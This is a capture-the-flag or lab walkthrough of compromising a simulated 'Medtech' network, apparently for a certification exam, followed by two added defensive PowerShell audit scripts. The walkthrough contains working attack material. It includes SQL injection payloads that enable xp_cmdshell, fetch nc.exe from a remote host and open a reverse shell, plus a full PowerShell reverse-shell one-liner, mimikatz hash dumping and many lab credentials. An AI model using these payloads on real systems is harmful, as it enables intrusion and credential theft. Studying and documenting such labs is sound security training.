# Challenge 1 - Medtech

* ![image](https://hackmd.io/_uploads/B1-tVNsxll.png)
* ![image](https://hackmd.io/_uploads/H1udNEilee.png)

## 0x1 Recon

### Rustscan

* 120
  * ![image](https://hackmd.io/_uploads/rJ0J17oggl.png)
* 121
  * ![image](https://hackmd.io/_uploads/rkdX1migeg.png)
* 122
  * ![image](https://hackmd.io/_uploads/rJMU1Xixge.png)

### Nmap

#### Internet

* 192.168.115.120
  * ![image](https://hackmd.io/_uploads/SyjxJ7jxll.png)
* 121
  * ![image](https://hackmd.io/_uploads/BkAFJQsgeg.png)
* 122
  * ![image](https://hackmd.io/_uploads/HJtDJ7ixee.png)

#### Intranet

* 172.16.115.10 (DC01)
  * ![image](https://hackmd.io/_uploads/SJqaZhczgg.png)
* 172.16.115.11 (FILES02)
  * ![image](https://hackmd.io/_uploads/Bypxfh5Mel.png)
* 172.16.115.12 (DEV04)
  * ![image](https://hackmd.io/_uploads/HktffhqMxx.png)
* 172.16.115.13 (PROD01)
  * ![image](https://hackmd.io/_uploads/H1KVM3cGxx.png)
* 172.16.115.14 (Linux?)
  * ![image](https://hackmd.io/_uploads/SkHIGnczlx.png)
* 172.16.115.82 (CLIENT01)
  * ![image](https://hackmd.io/_uploads/rJ8KMhcMex.png)
* 172.16.115.83 (CLIENT02)
  * ![image](https://hackmd.io/_uploads/rJmiz3qMee.png)

### Website

* The login page on 121 is vulnerable to SQL injection
  * ![image](https://hackmd.io/_uploads/HJfwmmillx.png)

## 0x2 Shell as mssql (WEB02_121)

* Got a hash from `xp_dirtree` with Responder, but I can't crack it
  * ![image](https://hackmd.io/_uploads/B1__PdNGle.png)

```sql=
123';exec master..xp_dirtree '\\192.168.45.155\test';--
```

```sql=
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.249:8000/nc.exe C:\windows\temp\nc.exe';
EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.249 9005 -e cmd.exe';--
```

* Run sqlmap
  * ![image](https://hackmd.io/_uploads/SydqPXslxl.png)
  * ![image](https://hackmd.io/_uploads/B122wmixge.png)

```bash=
sqlmap -r req_121 --level 5 --risk 3 --batch --dbs -p ctl00%24ContentPlaceHolder1%24UsernameTextBox
```

* Got a reverse shell
  * ![image](https://hackmd.io/_uploads/HJZB5Xjegg.png)
  * ![image](https://hackmd.io/_uploads/SkUUcXoeel.png)

```cmd=
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('192.168.45.187', 4444);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
```

```bash=
rlwrap -cAr nc -lvnp 4444
```

* Upload and run `tsh`
  * ![image](https://hackmd.io/_uploads/SyGe67sglg.png)

## 0x3 Shell as Administrator (WEB02_121)

* JuicyPotato succeeded
  * ![image](https://hackmd.io/_uploads/HkvwR7oxle.png)
* Dumped the admin's hash with `mimikatz`
  * ![image](https://hackmd.io/_uploads/Hy94lVillg.png)
* `administrator:b2c03054c306ac8fc5f9d188710b0168`

```powershell=
PS> mimikatz.exe
mimikatz # lsadump::sam
```

* Now we can connect over WinRM with the admin's credentials
  * ![image](https://hackmd.io/_uploads/H1hkW4ilxg.png)
* Downloaded `test.zip` from `joe`'s Downloads folder
  * ![image](https://hackmd.io/_uploads/B1MjZEjllx.png)
* Found an SQL credential
  * ![image](https://hackmd.io/_uploads/rJkCWVolgl.png)
* `sa:WhileChirpTuesday218`
* Running `netstat` shows that 121 has connections to 172.16.138.*; this may be useful
  * ![image](https://hackmd.io/_uploads/rJBzBVileg.png)
* Found user `joe`'s password with `mimikatz` (`sekurlsa::logonpasswords`)
  * ![image](https://hackmd.io/_uploads/rkZnjs9Geg.png)

## 0x4 Shell as offsec (VPN_122)

* Logged in to 122 with `ssh` as offsec; the password is `password`
* `offsec:password`
  * ![image](https://hackmd.io/_uploads/ByBCTi9Mex.png)

## 0x5 Shell as root (VPN_122)

* Used `openvpn` to open a shell as root
  * ![image](https://hackmd.io/_uploads/ByHuCo9Mex.png)

## 0x6 Shell as joe (FILES02_11)

* `joe:Flowers1`
  * ![image](https://hackmd.io/_uploads/HygKHnczxl.png)
* Found more user credentials in `fileMonitorBackup.log`
  * ![image](https://hackmd.io/_uploads/rJnSUh5fll.png)
  * ![image](https://hackmd.io/_uploads/rJcCH25Mgg.png)
  * ![image](https://hackmd.io/_uploads/Bycx8nqfxx.png)
  * ![image](https://hackmd.io/_uploads/BJrfInczlx.png)
  * ![image](https://hackmd.io/_uploads/r1sdU39Mgx.png)
* `goomba:8e9e1516818ce4e54247e71e71b5f436`
* `toad:5be63a865b65349851c1f11a067a3068`
* `daisy:abf36048c1cf88f5603381c5128feb8e`
* `wario:fdf36048c1cf88f5630381c5e38feb8e`
* Only `wario`'s hash could be cracked: the password is `Mushroom!`
* `wario:Mushroom!`

## 0x7 Shell as system (FILES02_11)

* Uploaded `Juicypotato` & `nc` and ran it
  * ![image](https://hackmd.io/_uploads/S1w6_3cGgx.png)
  * ![image](https://hackmd.io/_uploads/HkheK29fee.png)
* Got the admin hash from `mimikatz`
  * ![image](https://hackmd.io/_uploads/rJrq535Mee.png)
* `Administrator:f1014ac49bae005ee3ece5f47547d185`

## 0x8 Shell as wario (CLIENT02_83)

* Logged in to CLIENT02 as `wario`
  * ![image](https://hackmd.io/_uploads/BJYpGJifll.png)
  * ![image](https://hackmd.io/_uploads/HkdJQysMxe.png)
* `wario:Mashroom!`

## 0x9 Shell as system (CLIENT02_83)

* Following the linpeas output, we found that the file `audittraker.exe` grants Everyone full access
  * ![image](https://hackmd.io/_uploads/HJeGqkszlx.png)
* So I replaced it with our malicious file, started the service with `sc.exe`, and got a shell as SYSTEM
  * ![image](https://hackmd.io/_uploads/rkiW31szll.png)
  * ![image](https://hackmd.io/_uploads/S1fM21oGll.png)
* Dumped hashes with `mimikatz`
  * ![image](https://hackmd.io/_uploads/Hyhihyofgg.png)

## 0x10 Shell as system (CLIENT01_82)

* Found another credential on CLIENT01 via SMB
  * ![image](https://hackmd.io/_uploads/ry5G01ofex.png)
* `yoshi:Mushroom!`
  * ![image](https://hackmd.io/_uploads/ByCP1xjzge.png)
* Used `psexec.py` to log in as `yoshi`
  * ![image](https://hackmd.io/_uploads/rkDwxljMle.png)
  * ![image](https://hackmd.io/_uploads/BkiZZgsGxg.png)

## 0x11 Shell as yoshi (DEV04_12)

* ![image](https://hackmd.io/_uploads/BJYFEljMex.png)
* ![image](https://hackmd.io/_uploads/B1N0NeoGle.png)

## 0x12 Shell as administrator (DEV04_12)

* `winpeas` shows a file `backup.exe` in `C:\TEMP` that `yoshi` has write permission on, and it is scheduled to execute
  * ![image](https://hackmd.io/_uploads/rkufvlifgx.png)
* So I replaced it with our malicious file and got a shell as admin
  * ![image](https://hackmd.io/_uploads/rybaFesMex.png)
  * ![image](https://hackmd.io/_uploads/H1dxcxofel.png)
* Found user `leon`'s password with `mimikatz`
  * ![image](https://hackmd.io/_uploads/HykCqljzex.png)
* `leon:rabbit:)`

## 0x13 Shell as leon (PROD01_13)

* ![image](https://hackmd.io/_uploads/BJF2iliGee.png)
* ![image](https://hackmd.io/_uploads/rJtSheozgx.png)

## 0x14 Shell as system (PROD01_13)

* Uploaded the potato and nc, got a shell as SYSTEM
  * ![image](https://hackmd.io/_uploads/SJgSTgsMel.png)
* Administrator hash from `mimikatz`
  * ![image](https://hackmd.io/_uploads/B14zRgjzgg.png)

## 0x15 Shell as system (DC01_10)

* ![image](https://hackmd.io/_uploads/S15oAeiGxl.png)

## 0x16 Shell as offsec (WEB01_120)

* ![image](https://hackmd.io/_uploads/HJXr1ZiGxg.png)
* ![image](https://hackmd.io/_uploads/SyB6Jbjfxl.png)
* `offsec/century6`

## 0x17 Shell as root (WEB01_120)

* Used `sudo su` to switch to `root`
  * ![image](https://hackmd.io/_uploads/SywQlZjfgl.png)
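Editor's addition, not part of the write-up or of any tool it uses: the SQL Server checks a defender would run against the 0x2 chain, where the web application's login was allowed to turn on `xp_cmdshell`. The script is PowerShell using the built-in .NET `SqlClient`; it assumes the caller is a Windows sysadmin login on the instance, and `$Instance` and `$ErrorLog` are placeholders to adjust. The option names are those in `sys.configurations`, and the ERRORLOG pattern is the message SQL Server writes whenever `sp_configure` changes an option.

```powershell
# Added hardening check (editor's example, not the write-up's code).
# Audits the SQL Server settings that turned the SQLi on WEB02 into code
# execution: xp_cmdshell and related options, and which logins hold sysadmin.
# Assumes a sysadmin Windows login on the instance; $Instance/$ErrorLog are placeholders.
param(
    [string]$Instance = 'WEB02',   # placeholder: host\instance to audit
    [switch]$Fix,                  # also disable every dangerous option found enabled
    [string]$ErrorLog = 'C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Log\ERRORLOG'  # placeholder path
)

$dangerous = @('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries', 'clr enabled')

$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=$Instance;Integrated Security=True;TrustServerCertificate=True"
$conn.Open()
$cmd = $conn.CreateCommand()

# 1. Which of the dangerous options are currently in use?
$inList = ($dangerous | ForEach-Object { "'$_'" }) -join ','
$cmd.CommandText = "SELECT name, value_in_use FROM sys.configurations WHERE name IN ($inList)"
$enabled = @()
$reader = $cmd.ExecuteReader()
while ($reader.Read()) {
    $name  = [string]$reader['name']
    $value = [int]$reader['value_in_use']
    $state = if ($value -eq 1) { 'ENABLED' } else { 'disabled' }
    Write-Output ("{0,-30} {1}" -f $name, $state)
    if ($value -eq 1) { $enabled += $name }
}
$reader.Close()

# 2. Which logins are sysadmin? The web application's login must not appear here:
#    without sysadmin, the injected sp_configure / xp_cmdshell calls fail.
$cmd.CommandText = "SELECT name FROM sys.server_principals WHERE type IN ('S','U','G') AND IS_SRVROLEMEMBER('sysadmin', name) = 1"
$reader = $cmd.ExecuteReader()
while ($reader.Read()) { Write-Output ("sysadmin login: {0}" -f $reader['name']) }
$reader.Close()

# 3. Optionally turn the dangerous options back off. Advanced options can only be
#    changed while 'show advanced options' is on, so toggle it around the change.
if ($Fix -and $enabled.Count -gt 0) {
    $stmts = @("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;")
    foreach ($name in $enabled) { $stmts += "EXEC sp_configure '$name', 0; RECONFIGURE;" }
    $stmts += "EXEC sp_configure 'show advanced options', 0; RECONFIGURE;"
    $cmd.CommandText = $stmts -join ' '
    $cmd.ExecuteNonQuery() | Out-Null
    Write-Output ("Disabled: {0}" -f ($enabled -join ', '))
}
$conn.Close()

# 4. Detection after the fact: SQL Server logs every sp_configure change to
#    ERRORLOG, so re-enabling xp_cmdshell (as in 0x2) leaves this line behind.
if (Test-Path -LiteralPath $ErrorLog) {
    Select-String -LiteralPath $ErrorLog -Pattern "Configuration option 'xp_cmdshell' changed from 0 to 1" |
        ForEach-Object { Write-Output ("ERRORLOG: {0}" -f $_.Line) }
}
```

Run it as `.\Audit-SqlDangerousOptions.ps1 -Instance 'WEB02' -Fix` from an elevated prompt on the server or a management host. The ERRORLOG line is the cheapest detection for this whole step: forward it to the SIEM and alert on it, because a legitimate change to `xp_cmdshell` in production should be rare enough to review by hand. Disabling the option is only half the fix; the web application's SQL login also needs to lose sysadmin, since a sysadmin can always re-enable it.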
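Editor's addition, not the write-up's own tooling and not winPEAS/linPEAS output: a PowerShell audit for the misconfiguration behind both 0x9 (`audittraker.exe` with full access for Everyone) and 0x12 (`backup.exe` in `C:\TEMP`, writable by `yoshi` and run on a schedule). It lists every service binary and scheduled-task executable, plus the directory each lives in, that a low-privilege principal can modify or replace. `Get-BinaryPath`, `Test-WeakAcl`, `$WeakPrincipals` and `$WriteMask` are names chosen for this example; everything else is standard PowerShell and .NET, and it assumes it is run as an administrator on the host being audited.

```powershell
# Added hardening check (editor's example, not the write-up's code).
# Reports service and scheduled-task executables that weak principals can
# modify or replace, the root cause of 0x9 and 0x12. Report-only; changes nothing.

$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let a caller change the file, or (on its directory) swap the file out.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
$GenericWriteOrAll = 0x50000000   # GENERIC_ALL | GENERIC_WRITE, as seen on some inherited ACEs

function Get-BinaryPath([string]$CommandLine) {
    # A service PathName or task Execute value may be quoted, unquoted with spaces, or use %VARS%.
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    $m = [regex]::Match($cl, '^"([^"]+)"|^([^"]+?\.exe)', 'IgnoreCase')
    if ($m.Groups[1].Success) { return $m.Groups[1].Value }
    if ($m.Groups[2].Success) { return $m.Groups[2].Value }
    return ($cl -split '\s+')[0]
}

function Test-WeakAcl([string]$Path, [string]$Owner) {
    # Emit one record per Allow ACE that grants a weak principal write-like rights.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        $rights = [int]$rule.FileSystemRights
        if ((($rights -band $WriteMask) -ne 0) -or (($rights -band $GenericWriteOrAll) -ne 0)) {
            [pscustomobject]@{
                Owner     = $Owner
                Path      = $Path
                Principal = $rule.IdentityReference.Value
                Rights    = $rule.FileSystemRights
            }
        }
    }
}

$findings = @()

# Services: the binary itself and the directory it lives in. A service that runs as
# LocalSystem with a replaceable binary is exactly the 0x9 case.
foreach ($svc in Get-CimInstance Win32_Service) {
    $bin = Get-BinaryPath $svc.PathName
    if (-not $bin) { continue }
    $label = "service $($svc.Name) ($($svc.StartName))"
    $findings += Test-WeakAcl -Path $bin -Owner $label
    $findings += Test-WeakAcl -Path (Split-Path -Parent $bin) -Owner "$label dir"
}

# Scheduled tasks: each Exec action, labelled with the account the task runs as (0x12 case).
foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }
        $bin = Get-BinaryPath $action.Execute
        if (-not $bin) { continue }
        $label = "task $($task.TaskName) ($($task.Principal.UserId))"
        $findings += Test-WeakAcl -Path $bin -Owner $label
        $findings += Test-WeakAcl -Path (Split-Path -Parent $bin) -Owner "$label dir"
    }
}

$findings | Sort-Object Path, Principal -Unique | Format-Table -AutoSize
```

Every row is a binary that a standard user can swap for their own before a privileged account runs it. Remediation is to move the executable under a directory only administrators can write to (for example `%ProgramFiles%`) and remove the offending ACE rather than merely adding a deny; if the task or service really needs a user-writable working directory, point it at a separate data directory, not the one holding the executable.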